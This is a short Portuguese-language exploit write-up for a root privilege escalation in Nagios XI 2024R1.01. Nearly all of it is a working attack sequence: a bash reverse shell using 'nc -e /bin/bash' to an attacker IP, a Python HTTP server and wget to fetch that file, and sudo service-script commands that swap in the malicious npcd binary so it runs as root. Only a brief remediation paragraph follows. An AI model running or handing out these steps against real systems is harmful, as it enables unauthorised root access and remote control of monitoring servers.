
Escalação de privilégios no Nagios 2024R1.01
CVE Descoberta por: Jarod Jaslow (MAWK)
Como o usuário "NAGIOS", crie um arquivo na máquina do atacante com o seguinte conteúdo:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Hospede o arquivo na máquina do atacante por meio de um servidor HTTP Python:
python3 -m http.server 8000

Inicie um servidor de escuta Netcat (NC) na máquina do atacante:
nc -nlvp 4445

Baixe o arquivo da máquina do atacante:
wget http://<Attacker IP>:8000/npcd

Execute os seguintes comandos para escalar privilégios e receber uma conexão como root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Recomenda-se restringir a capacidade do usuário "NAGIOS" de escrever nos executáveis de serviço do Nagios que são executados como root. Isso pode ser alcançado implementando permissões de arquivo e controles de acesso mais rígidos para os diretórios e arquivos relevantes associados aos serviços do Nagios.
Isso deve ser corrigido em novas versões
CVE: